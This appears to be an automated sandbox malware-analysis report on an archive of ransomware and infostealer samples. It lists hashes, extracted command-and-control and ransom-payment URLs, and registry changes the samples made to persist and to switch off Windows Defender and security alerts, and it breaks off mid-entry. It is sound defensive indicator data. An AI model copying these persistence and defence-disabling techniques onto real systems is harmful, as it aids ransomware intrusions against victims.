Analysis
-
max time kernel
169s -
max time network
216s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
07-11-2024 16:46
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00361.7z
Resource
win7-20240708-en
Errors
General
-
Target
RNSM00361.7z
-
Size
22.0MB
-
MD5
178c5959b76748b2dc7b8375d12db80e
-
SHA1
f292fe20d20524d7d9ac5658f35c4b85bea72112
-
SHA256
f526608a5b27e9f3b290011efc5ed2098a48cbb522d15f7788dcda4158a23f49
-
SHA512
9dc3274909bb0d6a39da8008d9c72ded281581f8ceab4e667670cf8e29fe5fca173ea7a2f53d1a34effeceac0105029202f83d83a1ecb1a548009aa81c4f18c0
-
SSDEEP
393216:uM1EMy1RIPjtv22c20MTko/jMbyQ4kFnsMXzoBzapYxt3Ld:uQPyPI5vvc2ZuQkqMM9a+h
Malware Config
Extracted
azorult
http://admin.svapofit.com/azs/index.php
Extracted
C:\Program Files (x86)\Microsoft Office\Office14\1033\#Decrypt_Files_ReadMe#.rtf
https://bitmsg.me}}}\f0\fs24
https://bitmsg.me/users/sign_up}}}\f0\fs24
https://bitmsg.me/users/sign_in}}}\f0\fs24
Extracted
C:\Users\Admin\Documents\!HELP_SOS.hta
http://'+s.bp
http://'+s.bp+s.txp+tx
Extracted
C:\Program Files (x86)\Adobe\Reader 9.0\Esl\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT
Extracted
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html
Extracted
C:\ProgramData\Adobe\Updater6\!HELP_SOS.hta
http://'+s.bp
http://'+s.bp+s.txp+tx
Extracted
C:\XK\Restore-My-Files.txt
http://dtutgqjuzv7sktgl.onion/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
GandCrab payload 3 IoCs
resource yara_rule behavioral1/files/0x0005000000019cd5-99.dat family_gandcrab behavioral1/memory/752-121-0x000000000F270000-0x000000000F28B000-memory.dmp family_gandcrab behavioral1/memory/752-42454-0x000000000F270000-0x000000000F28B000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
GlobeImposter
GlobeImposter is a ransomware first seen in 2017.
-
Globeimposter family
-
Hawkeye family
-
Matrix Ransomware 2 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc HTTP URL 6 http://murik.xyz/add.php?apikey=Bktsttddz&compuser=NNYJZAHP|Admin&sid=IhOuDhP3dkLHA6aN&phase=START HTTP URL 7 http://murik.xyz/add.php?apikey=Bktsttddz&compuser=NNYJZAHP|Admin&sid=IhOuDhP3dkLHA6aN&phase=L_334F3FDC2140DC83_8188_2GB -
Matrix family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\IExplorer.exe\"" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\IExplorer.exe" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" winsvcs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" winsvcs.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5396 4240 cmd.exe 223 -
Troldesh family
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winsvcs.exe -
Contacts a large (7734) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (292) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (8764) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 66919 3880 mshta.exe -
Disables RegEdit via registry modification 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe -
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation otheo.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_sTlLoTpq.hta Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe -
Executes dropped EXE 64 IoCs
pid Process 2040 Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 540 Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe 2936 Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 2900 Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe 484 Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 1828 Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe 1648 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe 1652 Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe 1740 Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe 1136 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 752 UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe 1940 Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe 1260 Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe 2116 Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe 1988 Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe 3036 Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe 2220 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 2548 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe 2192 Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe 300 VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe 1852 2aua0mwa.exe 2672 Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe 4156 winsvcs.exe 3928 Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe 4124 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 2684 xk.exe 2132 Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe 3768 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe 1992 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 448 msconfig.exe 4864 Rj3fNWF3.exe 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe 3784 IExplorer.exe 1288 Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe 4600 Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe 6048 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 4764 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe 3468 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe 4220 WINLOGON.EXE 3396 Rj3fNWF3.exe 5960 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 5824 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 2092 Rj3fNWF3.exe 1660 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 4892 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 5804 Rj3fNWF3.exe 4144 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 5784 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 4216 CSRSS.EXE 2616 Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe 3112 Windows Update.exe 1896 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 1508 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 4932 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 1604 database.exe 2828 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 4960 SERVICES.EXE 2944 LSASS.EXE 4672 SMSS.EXE -
Loads dropped DLL 64 IoCs
pid Process 1988 Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe 1988 Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe 1940 Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe 1940 Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1136 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 1260 Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe 1260 Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe 1136 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 4600 Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe 3112 Windows Update.exe 3112 Windows Update.exe 3112 Windows Update.exe 2616 Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe 2616 Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 4908 MsiExec.exe 4908 MsiExec.exe 4908 MsiExec.exe 1652 Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe 1652 Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe 4908 MsiExec.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 3112 Windows Update.exe 6848 Windows Update.exe 6848 Windows Update.exe 6848 Windows Update.exe 4908 MsiExec.exe 1604 database.exe 1604 database.exe 1604 database.exe 4908 MsiExec.exe 1604 database.exe 1604 database.exe 1604 database.exe 4908 MsiExec.exe 1604 database.exe 1604 database.exe 1604 database.exe 1604 database.exe 1604 database.exe 1604 database.exe 1604 database.exe 1604 database.exe 1604 database.exe -
Modifies system executable filetype association 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" winsvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winsvcs.exe -
Adds Run key to start application 2 TTPs 20 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dgjdaeidbqp = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\yhcdek.exe\"" UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\{92B57C42-7CF8-0821-3E7F-AB0C11339E69} = "C:\\Users\\Admin\\AppData\\Roaming\\Buomf\\otheo.exe" otheo.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck = "C:\\Users\\Admin\\AppData\\Local\\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe" Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\fthjwtvu\\urcaivfs.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe = "C:\\Windows\\System32\\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe" Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSconfig = 